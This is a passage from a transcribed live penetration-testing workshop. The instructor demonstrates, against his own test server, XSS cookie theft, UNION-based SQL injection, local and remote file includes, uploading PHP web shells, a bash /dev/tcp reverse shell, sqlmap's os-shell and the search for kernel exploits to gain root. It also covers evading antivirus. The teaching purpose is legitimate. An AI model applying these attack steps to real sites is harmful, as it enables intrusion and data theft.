wanted to see the session cookie, I just said document.write, document.cookie. And you have to do that nested in parentheses like this. Now, doing that will make the cookie display on the screen. So now you can see, here's my session ID. Okay. Now what I'm going to do is I'm just going to go back to this main screen. I'm going to do this JavaScript. Let's go document.write. And now in here, I'm going to say document.cookie. Let's change this up. Document.cookie equals who's the master. Sure enough. Okay, we'll throw that in quotes like that. Hit enter. Let's spell that right. Let's fix that. JavaScript. There we go. Okay, so now right there, we'll paste this over the top. Man. I am really having a bad demo day, huh? JavaScript, :void, document.write. Now I'm going to delete one parent, delete this other parenthesis, put it right here, document.cookie equals who's the master. So let's put that in quotes. There we go. That looks like that worked. Now I'm just going to go back real quick. I'm going to say JavaScript, and now try to print it. And there we go. Okay. So this is showing you that we can modify the session cookie. So we would take the session cookie that we stole from a user, we would go to this website, and we would modify the session cookie. And you could do it right here in the browser just like that. Now you could also do it with your proxy. So now let's say you have somebody, you have a situation where you have, let's say I go here, I'll go Amazon, and now what I want to do is inside of my tools, I'll use something like Tamper Data, or you'll use Burp Suite. I'm just going to do a quick refresh here. Well, let's tamper with it. And now right here, do you see your session data is here? Here would be where you would put the session ID that you stole. So now you could now interact with this website as another user. And this is the reason why people want proxies. So when you hear people talking about, oh, Burp Suite and Web Scarab and Paros and Rat Proxy and all this other stuff is just the awesomest thing since sliced bread, and it's just because it's going to give you the ability to swap stuff out. But that's a pretty good rub cheetah blood on the VM box and pay homage to the demo gods. It's a good one, Marty. Okay, so All right, so that's what's going on with cross-site scripting. I think you guys are kind of seeing what I'm seeing. I don't particularly care for using cross-site scripting the way I'm showing it to you. And the reason is because session data really has a short lifetime. So like let's say here, we look at this. This is from April 9th. Well, I think you're going to run into a little issue trying to use this session cookie because I'm sure it's long since expired, right? So what you're going to want to do, in my opinion, I prefer to use a password stealer when I identify cross-site scripting. So if you look here, we're going to do the same thing, but instead of doing an alert pop-up, I'm going to go for something that gives me something like this. And you have a lot of people who do stuff like this, right? They'll fall for this. A ton of people will fall for this. The other thing that I've run into is customers, when they see this, are more likely to fix this because I just tell them, well, you have cross-site scripting, someone can steal passwords. So as soon as the customer sees that they have cross-site scripting and password stealing is possible, I get people who actually fix it. Okay, cool. All right, so that's the kind of thing that I find, for me, helps a whole lot more. Before, I would identify cross-site scripting, and I would come back the following year, and it would always still be there. Customers would fix the SQL injection, but not fix the cross-site scripting. And again, it's because I just don't think customers were really having it explained to them what's the impact, what could happen if a person actually gets this vulnerability to work. Okay, so option 1 just steals the username. Option 2 steals the username and the password. And for those of you who want the source code that I used to make this, I'll certainly give that to you. All right, now I need to, this is why I really should have sent this up later. This is not the correct IP address. This IP address, this, excuse me, this 10.10.107 is the IP address for inside of the network. So, okay, so now the next question that people are asking is, how do I get this onto a user's machine? Well, this is the part that we have to get this stuff onto a place where the website allows you to do user-generated content, a forum, a blog, a guest book, anywhere where I can type and someone else can see it. So, you know, if I'm on someone's Facebook page and I'm right on their wall and they're going to come back and look at it and click on it, that's what I need. I need to get this on the site so that when another person comes to it later, that other person will run it for me. And that's the real thing with cross-site scripting and all abuse of trust-related attacks, cross-site request forgery and all those. They're all derivatives of this. Okay, so why is HTTP only cookie more secure? What it's going to do is it's going to restrict you from accessing cookie data depending on the way the HTTP request is. Just because the HTTP only flag is set does not mean that it can't be exploited. It's just more difficult. You know, that's probably a good lab I should build out. So I'll try and build out a demo for that. I can't do it today. It'd take me a minute, but That's the kind of thing that's really good. Those are the types of things you want to tell the customer to do, but just because it's been done does not mean that it's not exploitable. Okay? It's just much, much, much more difficult to exploit. Okay, so let's go and let's look at a website. So I put up a server last night, and it looks like it's still online. Hallelujah, thank you, Jesus, it's still online. So I threw this up on Amazon EC2 this morning, and I got it working like a half hour before class started in true Joe McRae fashion. Okay. Now, what I want to do is I want to just kind of walk you through some manual web app testing. I really think being able to test a website by hand is a really valuable skill. The same way that a person should be able to do his network pen test stuff by hand because he can validate his scanner. So if you're trying to give a customer scan results and you can't validate the false positives, you're in a world of hurt. If you're giving a web app assessment and you can't validate false positives, you're in a world of hurt. Once you know how to perform the assessment by hand, where you don't need anything except the browser, that's when I think you'll very quickly start feeling more comfortable. All right. Much love for you, Andrew, man. Thanks. Do I bug bounty at all? No. No. I would certainly love to. Right now, the priority in my life is getting Pentester Lab working and getting all my classes going and doing more consulting. I don't really gain a whole lot out of the whole bug bounty thing because, quite frankly, unless you write some really, really awesome exploits, there's not a lot of money in it. So the generic bug bounties for stuff like Mozilla and Google and all that really aren't a lot of money until you start getting into stuff where you're writing like 0 days for big name products. There's just not a lot of cash in it. So quite frankly, I could make more money working at McDonald's. Okay, Conrad wants to know if everything I'm doing is the same for things like CMSs, things like WordPress, Drupal, 50 cal want fries with that bug. Okay. So, yeah. Yeah, Leon, I'm not doubting it, man. I'm not saying that you can't make good money doing bug bounties, but generally the guys who make good coin, are like your Charlie Millers of the world, who are writing exploits and getting like $50,000, $60,000 checks. I don't want to write bugs for like $1,400. Yeah, guys like Zupin and these types of, there's some guys who really make some real cash, doing it, but those guys write really serious vulnerabilities, and it's not uncommon for those guys to work on a bug for like 3-4 months. Not uncommon. So, all right, so when people are asking about, hey, this is all JSP and PHP, content management systems, when it comes to web vulnerabilities, it's pretty much the same. So you really don't need to worry that, hey, is it different because it's ASP versus JSP versus PHP versus Cold Fusion. It's not really that different. When you're messing with a website, there's only a couple of things that you're going to look for. So let's start with this PHP-based website that I just gave you guys. Let's drive around it a little bit. Okay, so the first thing that I do is I go to the website and I try to see if there's parameter passing. So when I mouse over, you guys see that there's parameter passing. If you take a look in the bottom corner, you guys see that there's the page name, question mark, the parameter name, question mark, the parameter, equals the parameter value. So just me mousing over that, you can see that there's parameter passing, and that lets you know that the website is more than likely talking to a database of some sort, data store, something. So that's of interest to us. Can I interact with this? So what I'm going to do is I'm going to click that link, and when I click that link, you look up here, you see that it went to this page. What I'm going to do is I'm going to insert a single quote right there. So right after the letter R, I'm going to insert a single quote. Let's see what happens. So I insert my single quote, I hit enter, and now I end up with a MySQL error. Okay, so that's a pretty good heads up that there's probably SQL injection. Okay, all right, awesome. Good to know that there's probably SQL injection. Now, is that SQL injection exploitable is the real question. Now, just because you can trigger the error doesn't necessarily mean that you can gain data from it, but it's definitely the right step, right? Now, here's where your vulnerability scanner stops. Your vulnerability scanner, web inspect, app scan, whatever, generally identifies the vulnerability right here, and now after that, it doesn't go on to tell you that data can actually be extracted from it. Now, most vulnerability scanners now actually have like some sort of SQL injection tool, built into them, and that's what you're going to have to run to get the data out of it. So let's try and see if we can grab some data. What I'm going to do is I'm going to try and do an order by. So order by 100 dash dash. I'm going to hit enter. Now let's see. Looks like no change there. Yeah, definitely. Okay, so I actually had a student show me this trick. And when you guys see it, you're going to pull a WTF just like I did, right? So, whoops, there we go. All right, here's where I put in my single tick. I put in space, order by, and then here's my comment, dash dash. Right here, you need a space, right there. So you have to have a space here. How my student was brilliant enough to figure that out, I don't know. But that just proves that he is smarter than me. Okay, so you have a space. You have a dash dash, then a space, and then any one character right here. That can be any character. I just do another dash, but it can be a plus sign. It can be a letter. It can be any character. And by doing that, the order by actually worked. So I did an order by 100. And if we look here, we see that we have unknown column 100 in the order clause. I want you to think of like a spreadsheet, right? So if you've got something and you've got, let's say, 10 columns in a spreadsheet, you can order by 5 because you have, 10 columns. But you can't order by 50 because you don't have 50 columns. Yeah, Adrian, that definitely could be it. Putting one more dash in there makes it valid. But I've seen him do it with a plus sign. It still works. I've seen him do it, with like a letter. It still works. So, anything after the comment shouldn't be interpreted. Why the heck it does that, I don't know. And then really even how they need to try that, I was just like, okay, man, I'm drinking the Kool-Aid on that one. It's whoever figured that out is way smarter than me. Okay, hold on. Adrian is saying, URLs aren't valid if they have a space at the end, which is stripped. So you have a char at the end to fool the browser. Really, not the server. Oh, it's a browser trick. Okay, Adrian. No, I didn't know that. All right, and then Siddhartha is saying that a plus sign immediately after the comment works as well. Huh. Didn't know that. Didn't know that. Okay, let me try that other one that it just showed me. So if I put a plus sign here, that works too? Oh, yeah, because a plus sign represents a space. Yeah, that makes sense. Ah, okay. Not bad. Not bad. Learn something new every day, huh? Okay, let's see what we got here. So let's say we have 5 columns. We do an order, we have 10 columns. We do an order by 5. You know, we should get a valid page. We do an order by 50. We should get an unknown column number, right? So what I'm going to do is I'm going to change this 100 to a 50. So I still get unknown column. So I know there's not 100 columns. I know there's not 50 columns. Now I'm going to cut it in half again. I'll throw a 25. I do a 25, still unknown column. Let's go 15. Okay, 15, no joy. Okay, I'm going to cut it straight to 5. When I do that, I get a valid page. So there's more than 5 columns, but less than 15. So let me put it to 10. Okay, I do 10, I get an invalid page. So there's more than 5 columns, but less than 10 columns. So let's try 7. Okay, no 7. Let's try 6. Okay, 6, I get a valid page. So there's 6 columns. So now what I'm going to do is I'm just going to change this out to union, all, select. Now I'm going to count the columns out like this. So if you look at that, now if it's a string, because here lap equals acer, which is a string, so in this case, I'm going to keep my single quote here. Now, if lap equals 5, an integer, I would not keep that single quote. You would just say lap equals 5 space union all select whatever. But if what's being injected into is a string, you're usually going to append a quote. Okay? All right, so we've got that. Now, my next question is, why the heck did we do that? So if you look up a union select statement, you'll see that union select statements are required to have the same number of fields in the result set. So your union is joining 2 SQL statements together, the SQL statement that the developer wrote for the website and the SQL statement that you're writing for the attack. Your union is joining these 2 statements together. Now, if you're going to be joining these 2 statements together, the results have to have the same number of fields. That's the reason why we did the order by, to figure out how many fields there are. Once we came up with the correct number of fields, now we can build out our union select statement with the correct number of fields. Now what a lot of people will do is they'll do something like an and 1 equals 0 right here, and 1 equals 0. We'll do either that, or what I like to do is I like to negate the parameter value. So I'll change it to a negative number if it's a string, and I'll change it to the word null right here. I'm sorry, I'll change it to a negative number if it's an integer, and I'll change it to the word null if it's a string. So I just negate that, and now by negating it, you're going to get columns that show up. These column numbers that show up on the screen, that's where you're actually going to put in the actual operators for your SQL query. So let's try placeholder 4. So I'll go to 4. I'll put user, and in parentheses, when I hit enter, now you'll see there's my username. So it was column 4, I put user, there's my username. Okay, we have another column that echoes back data, and that should be what, column 5? Okay, so here's column 5. So in column 5, I'm going to put at version, and then bang. So now you can see here's column 4. Here's column 5. It's the MySQL version that we're running. Okay. You can also do things like at datadir. Where's the actual data stored at for this box? And you can see that my data is stored in varlib MySQL. So if I want to do, let's go through this stuff pretty quickly. What is that? 5.4.63.184. 63.184. Log into this sucker. Nope. 200.63.184. Oh, whoops. EC2-user. There we go. Okay, now let me see. History grep. What was it? CN? No. CF? No. Where the heck was that file? CODI. Let's see. What was that file I was using this morning? The MySQL configuration file. It's like something at the something.cf, right? Anybody remember? MySQL configure. Yeah, my.cnf. There you go. There we go. There's our guy. Yeah. Yeah, see how it's the same. See varlib MySQL, datadir, varlib MySQL. That's really where all the data is stored. Thanks, guys. Appreciate the help on that. Okay, so let's try some other stuff. Let's say we browse around and we go back to the home page. Okay, does the database user have write priv? So what we can do is we can go to the SQL Injection cheat sheet. And it's going to be on pentestmonkey.com. Let's go to the one for MySQL. Okay, Brian wants to know, could I have done that in reverse order, user in column 5 and version in column 4? And the answer is yeah, you can. So like if I wanted to put at version here, you certainly can. You can move that stuff around all over. Yeah, so Mauricio, yes, I'm running MySQL as root. That's exactly what you figured out. And that's definitely a security concern, right? You should be running the database as a lower privileged user. Okay. Now, what was I going to show you about these SQL injection things is it's really good to use these cheat sheets because this is where you're going to learn syntax and all that stuff. So this is your best places to learn syntax. So you see how we're doing the select at version, and here's how we got the current user. If you want to list users or list privileges, you're going to use this stuff here. Okay. And yeah, you can get password hashes. Okay. All right, so now next, let's say we cruise around. Now, it's pretty fair to assume that every single one of these, you guys notice as I click through these, they're all acr2.php with a parameter name of lap. You guys seeing that? All of these are. And then the parameter value changes. But this is the same SQL injection because it doesn't matter what category I choose, each one of them go here. The page name doesn't change, and the parameter name doesn't change. That's the same SQL injection. Your scanner is going to write it up as several different ones. I don't do that to the customer. It's only one place to fix. So there's no point in giving a customer something that says he's got 200 vulnerabilities. Realistically, what he has is one. He's just got to fix this in one place. So ACRE2.php, when it takes the parameter name lap and whatever parameter value, that's vulnerable to SQL injection. That's what needs to be fixed. Oh, Brian, the part of the screen's not visible. That's just because I'm using the, that's where the questions are. So, yeah, I keep the questions where I can see them, and there's just so many questions. Okay. Adrian, this is my website. I put this up this morning. Yeah. Missin, if you want the PowerPoints, I can send you the PowerPoints. I'll put that out in the email that goes out today. Certainly don't mind giving you guys PowerPoints. Okay. Yeah, I'll cover how to fix this in a little bit. All right. How are we doing on time? All right. We're getting about 12:30. I say let's take ourselves a bio break. Okay. All right, guys. Let's break. Let's give it 10 minutes. Okay, guys, let's get back at it. Excuse me. All right, so I think another really interesting thing that we can look at is, let's say I go to the About Us page. And, okay, let's do About Us. So is anybody seeing anything peculiar about this? What's peculiar about this, guys? Why is this a big deal? Anybody? Good, very good. Everybody's seeing it. You can read local files. If you can read local files, we're going to consider that a local file include, right? And how this differs from a remote file include, I'll get to in a second. But a local file include, I should be able to put like dot dot slash, dot dot slash, dot dot slash, dot dot slash, Etsy, pass WD, and you can see that I can now read the local file system. Okay? All right. So that is a local file include. So anytime that you're browsing the website and you see that the website references a file, you know, file equals something, doc equals something. Anytime where you see that it references a local file, that's when you need to start saying to yourself, okay, can I put it and point it to boot.ini? Or can I point it to Etsy password if it's actually a Linux machine? And you want to see if you can read local files on the file system. Yeah, Richard, you're right. There's still a lot of stuff out of here. Okay, there's still a lot of stuff out here where you still see things like this. Okay, now, yeah, absolute tabs will work, depending on the application. Yes. Okay. All right. Now, how does this work when it's an RFI? If it were an RFI, maybe it would say something like, I'm just making this up, but if it's an RFI, maybe it would say something like this database.php and database equals something, right? And then what you would do is you would change it to http://hackerwebsite.com/ Okay. All right. So now what's happening here is instead of referencing a local file, it's going to reference a remote resource, right? A good call that you'll see oftentimes is like database equals something, where the application will allow you to interact with a remote database, or it'll allow you to read a file off of another server somewhere, right? That's usually the cause of a remote file include. So what you're going to do is instead of connecting to a remote file or a remote database, you're going to put in the address of your malicious web server, the hacker web server, and then you're going to make it download something like a C99 shell or an R57 shell, some sort of hacker web shell. Right? Now, I've seen other people do other stuff with, like, maybe they download a rootkit. You know, doesn't matter. But a local file include is you trying to address interact with local resources. A remote file include the website interacts with a remote resource. You want to use that to pull down, your rootkit or your web shell or netcat or something down to the machine. If it interacts with local resources, then you want to try to read configuration files, read log files, things like that that allow you to, escalate privileges on the local machine. I'm about to show that, yeah. Bedrew asking about R57 and C99 shells. I'm going to cover that. Okay. All right, so here we've got that SE password. I'm going to turn around and also read /SE issue. So the SE issue is how I can figure out what the server is running. Okay, let's go and let's check this career page. Now we can see on the career page that it takes info. So let's try to throw in my name, skills, love hacking, throw in my phone number, give it an email address. I'll own some stuff. Okay, and now here's what we were just being asked about. So I'm going to go to, I think it's called Open Labs, openlabs.org. There you go. So you can go to openlabs.org. Okay, and here's that question about where can I get some clean shells from? And there's our answer, openlabs.org. And what you want to download is you want to download this Hacker WebKit. So we'll yank down Hacker WebKit. Now I'm going to grab that Hacker WebKit file, toss that on my desktop. Let's just extract that sucker here. Now let's open it up and let's take a look at it. So if we look, yeah, you can shell the site. That's cool. Okay, so if we look in here, we can see in the ASP, there's a cmd.asp. Okay, and what these are is these are what are called web shells. They're web pages, PHP, ASP, Cold Fusion. They're pages that allow you to execute commands. So I'm going to use the PHP one. I'm going to use cmd.php. I'm going to upload that to the site. So when I say upload resume, whoops. Right here, let's browse to it. I'm going to go into the PHP one. I'm going to use cmd.php. I'm going to upload that. Now, it's uploaded. We got another problem. Where the heck did it go? So what you're going to end up doing is literally searching around, right? So you run into this all the time. Your vulnerability scanner says file upload is possible. And it'll even upload a text file. But it usually doesn't tell you it found it. So, let me try temp. Okay, nothing there. Let me try Let me try files. Nothing there. Let me try CGI bin. Nothing there. Let me try upload. Nothing there. Let me try uploads. Okay, there's an uploads folder. Okay, but that's not what I uploaded. This looks like somebody who was using SQL map and Metasploit. So let's try resume. Bam. Okay, it looks like somebody already uploaded a C99 shell and a file. So there's my cmd.php. And now let me try to execute /sbin if config. Let's try that. And it looks like my shell didn't work. Let's try the ID command. Yay, my shell's not working at all. Isn't that awesome? That just makes you smile. Let's try 10.10.107. Is 107 working? Yep. And let me /resume. Okay. There's my cmd.php. Let's go /fconfig. That's what it should look like. And we can do other stuff too, right? So I'll start a netcat listener on my machine. Okay, I'm on 2.97. C-L BB-P 1, 2, 3, 4. Okay, and let's try it quick. Yeah, here we go. I'm going to put all this in here so you guys can see what I did. So this is a bash reverse shell using dev-tcp. So I'm doing bash-i greater than ampersand dev-tcp and the IP address of my Windows laptop. So I'll kick that over. And boom, I've got a shell here. So we take my shell, we do the ID command, and we've got a working Linux shell. Okay. So this definitely can do some cool things. It looks like it's going to take some mucking around to get this to work on Amazon EC2. I don't know if you guys got it working, but mine didn't work when I uploaded it up here. So definitely have to figure out what's going on with that. You know, I obviously didn't troubleshoot this. Okay, so my next question, Igor wants to know, I've got a shell running. How would I go about getting the root password? So I've got a live shell, but my shell's a user level shell. How would I get root? You've got a couple of things that you would try to do. So the first thing I would try to do is see if I can read any config files, because oftentimes, if I could read the config files in here, let's see, I'm going to cd up a directory, and now I'm just in var /dub, right? So let me go into the HTML folder. Okay, and then let's see, there's uploads, uploader.php, test.php, sql.txt, okay, md5.js, info.php. So let's read that. So cat info.php. Okay, it looks like it's just a regular PHP info file. Nothing there. Let's see. Oh, look, there's a file called bbconnect.php. So I'd mess with that, right? So let's cat that. Cat db connect.php. Okay, and this is what it's logging in as root, right? So that could be one way that I could go about it. Another thing that you could probably do would be to do like a uname -a. Okay, so it's Linux kernel 2.6.27. We go out to a website like ExploitDB, right? And we search, for anything in the Linux 2.6. So let's go platform, Linux x86. Yeah, I see it's a, x86. Type, let's look for ourselves a nice local exploit. And then hopefully we get ourselves. Okay, looks like that wasn't good. Let's try Linux. There we go. All right. So we would try to look for a Linux kernel exploit, some sort of Linux local exploit, Linux UDEV link. It'd be something like this, right? Linux kernel open time. We try to find one of these and see if running one of those would take us from regular user to root. That'd be the way that we go about it. 2.6.37, and what are we? We're 2.6.27. So 2.6.27. Is there any way to find a directory for upload? Other than manually searching or running some sort of brute force utility to look for directories, not very handy. You're really just going to be kind of thumbing around until you find it. You really are. Okay. Yeah, running tools like Dirtbuster and Burp Suite and those types of things that do the brooding for you, it's a great way to find that stuff. Okay. Okay, so let's go back to the site. All right, so now that we've got this, yeah, I'm using Red Hat just because it was a real fast way to get the server built. Okay. Okay, guys, just kind of deleting questions here. Man, a lot of questions. Okay, last thing that I wanted to show you guys, something else that I think is interesting. Okay, so we can do other stuff too, Let's say, for example, let's to open up a text file. We'll call it XFS, right? And then inside of this text file, let's go script, alert, script like this. Okay, now I'm going to save this as my cross-site scripting file. Let's upload this again. Okay, I probably shouldn't be so bold. It probably won't work, huh? Okay, so I created a text file that had my cross-site scripting in it. Now I'm going to upload it. To a resume. Oh man, did you guys kill the directory? It's RESUME. Well, the directory is there, but you can't see it. Oh, the server probably needs a reboot. You guys are having too much fun, huh? Let's see. Yeah, it was just there a minute ago. There we go. All right, so now it's all back. Let me go back and upload that. Okay, we'll go to career. Let's see. Okay. Now let's try and upload this XSS.text. Upload it. Let's jump into the resume folder. There you go, there's XSS.text. Let's open that up. Nope, not executing. Sometimes that executes. Boobs.php, that's funny. Okay. So depending on the website, sometimes this will actually execute. Right, and it'll actually give you cross-site scripting. So it didn't for me today, but I guess I'll have to check that app. If you're getting fields on this site, no, not this one. Another site that I have, yeah. Yeah, I don't know what I'll have to do with this. I was thinking I might need to rename it. Yeah, you're right. You know, maybe XSS.php or, you know, XSS.js, something like that. So I'll do that. Let's go for a break real quick. So we're hitting about 1 o'clock. So let's take a break and then let's start transitioning. Now would be a good time to boot up your Windows 7 machine. And then we'll come back. We'll finish up with any questions on web app before we turn around and jump on some of this other stuff. Okay, so let's take 10. Let's get right back in here. Yeah, you can do all the updates if you want. Not a problem. Yep, let's go 10-minute break. Okay, guys. Whew, had to get a little pick-me-up, get some candy. Tried to wait till my fiance was going to go shopping and then eat candy when she wouldn't see me, but I couldn't hold out. Now I'm going to do the healthy thing and wash this candy down with a nice rum and Coke. Let's see. Okay, so any questions for me? Let's see if I can take some questions on web app before we move on. Candy, is that what they call it now these days? Okay, is uploading a Linux shell, uploading a web shell, and a kernel exploit the only way to root? I wouldn't say it's the only way, but it's probably the most common way. It's probably the most common way. There are very, very few remote Linux exploits these days. So it's very hard to find a vulnerability in a service, you know, Apache or something like that you can exploit that'll give you root like we used to be able to do in the old days. Years ago, you would just launch an exploit directly at the web server itself, and you'd take over the web server. Now with things like ASLR and, you know, patch and SE Linux and all that kind of stuff, it's really hard to find remotely exploitable services. So usually you're going to gain access to the server via some sort of application vulnerability. That application vulnerability is going to give you the opportunity to interact with the OS, and then via interacting with the OS, you're probably going to use some sort of local exploit to escalate your privileges to root. That's going to be the majority of the times. Very rarely are you going to have like a remotely exploitable service. No problem, Mark. No problem at all. Yeah, Ace, you're 100% right. The better you know the system, the less likely you are to get detected. Now, I can see a person's asking, hey, do these web shells get detected? And the answer is sometimes. If people are running antivirus on their servers, a lot of web shells get detected by antivirus. If people are running host intrusion prevention systems, a lot of web shells get detected by that. In those cases, generally what the attacker will have to do will be to write their own web shell. So I've been on some pen tests, and the web shells that I've uploaded were common web shells, like these ones that I've just given you today. And they'll get eaten. They'll get eaten by intrusion prevention. They'll get eaten by antivirus. And, you know, the poor thing will work as soon as you upload it or as soon as you try to execute it, the poor thing gets ate up. So what you end up doing is you end up writing your own. And that sucks. It's not exactly the kind of thing that I like to do. But, you know, I've had to do it a couple times, and it takes a while. It really takes a while. Your best bet when you're doing these types of things is, if you have the time, to try your best to build a mock-up of the site functionality. So if it's a CMS, try to download a CMS and test those things in your own environment. I think that's one thing that they really don't know, that a lot of the public really doesn't know about what we do. Okay. Do I use things like Veil? Yes. Yes. Have I seen encoders help? Have I seen encoders help with this type of stuff? Not so much. Not so much. What if I'm running the web shell inside of something like an SSL tunnel, like what I showed you earlier? Generally not going to help very much, because usually the detection is host-based, not network-based. If the detection was network-based, then encryption would be all that you needed. But because the web shell runs on the host and the detection mechanism, either antivirus or intrusion prevention system, is usually on the host, that's why you usually get detected. Okay. How are you guys feeling on the subject? I deleted a question by accident. I think the question was about local and remote file includes. Did I cover that well enough? Do we still have any questions on that? Okay, local and remote file includes, okay. All right, good. Good. All right. Are any of you having to deal with stuff like web services? Any of you dealing with anything like that? Okay, web services? Okay. All right. So the easiest thing that I can think of to try to help you with this is a good reference is something like Amazon. So I think most of us shop on Amazon. So you ever notice how you purchase something on Amazon, or when you attempt to purchase something on Amazon, they'll show you other vendors who actually have the same product? So if you can find another vendor who has the same product, what you'll often find is this vendor has the product at a different price, and then you can even find out just how many of that product that the vendor has. Well, this is all accomplished using something called web services. And generally what happens is you have to publish what's called a web service description language file, or WSDL. So let's say if we want to use Amazon WSDL, and you can look at the Amazon WSDL file. This WSDL file is what shows you how to communicate with a web service. So when you're performing a penetration test, what you end up having to do is you end up having to try to figure out how to communicate with the app. So when you start your web services pen test, the first thing you're going to want to see is, do they have a published WSDL? And if they do, then yeah, that's what I'm going to use. Now, you're going to see tools like WSBang. So WSBang is nice because it's a tool that allows you to parse the WSDL. And then you can quickly figure out, okay, what's going on with this, right? And then what you'll be surprised to figure out is that messing with a web service is no different. Every time you get in here and you see one of these entities, so let's say here's an entity, look, marketplace domain, right here would be where you'd insert your SQL injection, where you'd insert your cross-site scripting. It's no different to you. So you're going to communicate with the web service, and then each entity, when people would tell you that they're fuzzing it, each entity is going to look to you like regular parameter passing. So you're just going to insert your single tick and your cross-site scripting and all of that in very much the same fashion. Now you have some people who use a tool called SOAP UI. SOAP UI. So what SOAP UI does is SOAP UI is a functional testing tool for web services. It allows you to interact with the web service. So it allows you to interact with the web service. It allows you to extend out each of the entities in the XML service, in the web service. Now, what you'll see people do is you'll see people who want to chain SOAP UI and Burp Suite. So what you end up with is you end up with the ability to run all of your different tests that you would with Burp Suite, and now you get to run that against the various web services. Okay, and a lot of people really think that's kind of the way to go. There you go. Okay, and this should be the kind of thing that should really kind of get you squared away. I've never used Zap and Rat Proxy. I mean, I think I've, to be honest, fired them up once. So I really can't give a whole lot of feedback on either of them. I mean, they're interesting, but effectively, it's just a proxy. All it does is let me look at traffic. So they're handy, but I still do the bulk of my stuff just with the browser. I'm not a big Burp Suite guru and all these different guys. I see plenty of guys who just live with Burp Suite, but I'm not real high on any of the proxies in particular. I would say Burp Suite is probably the most tuned to web app testing. It's probably the best proxy you can get if you're trying to go down the proxy route. Okay, the next question I got was, from my web shell, can I add a user? And in this particular case, the web shell is not a root shell. So you're kind of in that chicken before the egg thing, right? You can't add a user until you get root privileges. So because the web server in this case is running as just a regular user, there's not going to be a lot that you can do. So without a local exploit, you're going to need to escalate your privileges. Okay. All right, guys. Let me delete the rest of these questions. Let me start up my virtual machine. Let's make that transition. No, you don't need to power down your Ubuntu virtual machine. You're still going to need it as well. Okay, I'm just deleting questions here. Okay, looks like we have a question. In this example, uploading a file is going to a folder. If uploading the file goes into a database, how can we execute that file via the web server, assuming that SQL injection is possible? What you're going to want to do is you're going to want to create a temporary table, and you're going to want to move the contents of that file into your temporary table so that it can be executed as just generic ASP or PHP. So Hiran, I hope that answers your question. I don't really have time to show that, but through SQL injection, you're going to create a temporary table, and you're going to write data to that temporary table. Does that help? Okay, good. Good. Now, SQL map will create a lot of these temp tables for you. So oftentimes you'll see in the logs that SQL map has created a temporary table. Okay, looks like our question is, why are we using a 64-bit Windows 7? The reason that we're using a 64-bit Windows 7 was specifically because that's the kind of stuff people have been asking me to put in the classes. So people are aware that it's much more difficult to exploit 64-bit machines, and there really aren't very many vulnerabilities out there for 64-bit machines, particularly Windows 7 and Windows 8. So I wanted to try to start putting this stuff in the class. Like I said, I don't know how deep we're going to be able to get into it, but you know, I definitely want to start making a transition and start covering more Windows 7, more Windows 8, you know, more Server 2012. Yeah, and Joe, you're right. You know, more companies are moving to it, and you're really just kind of getting into a situation where you can't really get good performing hardware without going 64-bit. All right, guys, let's do it. Oh, whoops, I feel bad. I didn't. God dog. I didn't cover SQL map. Yeah, Crystal, you're right. Trying to recommend 64-bit is definitely the way to go. Okay, so let's change all of these 10.10.107 to seven. Let's do a quick replace here. Okay, so what I'm going to do now is I'm just going to run some SQL map commands real quick. Okay, so the first one we want to run is SQL map with the dash B as in boy, trying to get the banner. Okay, now I like to do the verbose output to a -3. It just lets you see the HTTP request and a little bit more information about it, about the attack. All right, looks like we got some good info here. All right, so it figured out that it's running Red Hat Enterprise Linux version 6. figured out that we're up against PHP 5.3.3 on Apache 2.2.15. Figured out that the specific banner is MySQL 5.1.69, and it wrote all of that data out to this IP address. Looks really handy, pretty good. Okay, so that was us just getting the banner. Let's turn around and let's grab the current user now. Okay, so we grabbed the current user and found that the current user is root. Okay, I'm going to paste in the commands that I've been running. Whoops. Okay, so this is just cding into the directory. Okay, and then this is getting the current database. And this is getting a listing of all of the databases. All right, so there's our databases. We've got a laptop tab, got a MySQL database and a test. Not very many databases on this server. Okay, let's grab all the tables. Okay, and then for Anthony wants the workshop file. Okay, now that workshop file isn't updated, but it should give you the right idea. And then I'll get out an updated version of it later. Okay. All right, now let's see about that ability to read files. We found that we had an ability to read files. Let me see if SQL Map can do it as well. Yeah, I'm not using 10.10. 10.10 is for the target host in the lab network. I'm using 54.200.63.184. Oh, okay, you're right. I am using 10.10. Run it against the server in here. I thought I did a find replace. Yeah, I thought I did a find replace, so it should have did this. Oh, I copied from paste in. Okay. Yeah. Yep, you're right. You're right. That's why I did that. Okay. Let me run it. Let me run it from here. Okay. All right, great. So now yank down that. Let's grab the WB file. Okay, we got that one yanked down now too. Now let's grab the etcmod. Probably not much in that file. Not too much in message of the day files anymore. Okay, and now let's try OS shell. I don't know if this will work, but it's worth a shot, right? So we'll go for OS shell. 3 because it's PHP. Now he wants to know where's the document root at. We're going to tell him that we know that the document root is here. And then where's the uploads directory? Now when we were doing all that guessing, we found that here's the uploads directory. So let's cross our fingers and let's see if that works. Okay, looks like that worked. So let's do an if config. Okay, and yeah. Okay, great. There's the internal IP address of the host. It's working very well. All right, and the fiance's off to go shopping. So what do you guys think? Do you guys think I should tell her how much I love her and tell her she can have all the money from this workshop? What do you think? Yeah. She can go shopping with all the money from this workshop. She's giving me a real nasty look because I said that. Oh, yeah. Yeah, I'm probably going to be in the doghouse for a little while for that one. Oh, ooh. Oh, I'm not going to tell her that. Tell her she's worth it. No, I'm not going to tell her that. Yeah, that's taking my life into my own hands. Oh, man. Oh, that's funny. Yeah, it'll pay me back with karma. Oh, man, that's good. That's good. Okay, so the OS shell one is a nice one. I actually really like this OS shell. And it just depends. You know, there's been servers that I've gotten on that the OS shell didn't work and the web shell did. And then this is another example where the web shell didn't work, but the OS shell did. And, you know, it's one of those things. Some things are just quirky. So we'll run the ID command. Okay, and great. See, that's working really well. So the OS shell for us is working great on this publicly available web server. But the web shell, for whatever reason, just wasn't. So I'm liking that. Okay, so I'm going to Control-C out of that, exit. And now what I'm going to do, let me give you guys all the syntax that I used for that. So I ran this. It prompted me for the path. So I ran that. Wanted to know explicitly how to get to the uploads directory, so I gave it that, and then it ran. Then I can give it system commands. Now the one that I'm about to try, and we'll have to cross our fingers and see if this works, is to point it to Metasploit. So let's give that a run. Okay, we're going to choose option 2 because it's PHP. Okay, the document root, we already came up with that, right? It's var www.html. Now we need the full path to the uploads directory. I'll throw that in there, and we'll see if it uploaded it. Looks like it didn't work with that stager, but not dynamically interpreted. Yeah, so we're no joy on that. So we're definitely going to have to use the OS shell, a trick that we were already doing. Okay. Well, that's a pretty good little demo because that's pretty much just what it's like on a real pen test, right? So, you just have to try to find 3, 4, 5 ways to do the same thing before you finally get it to work. That's a really good example of what it's like. And this is my first time trying to build 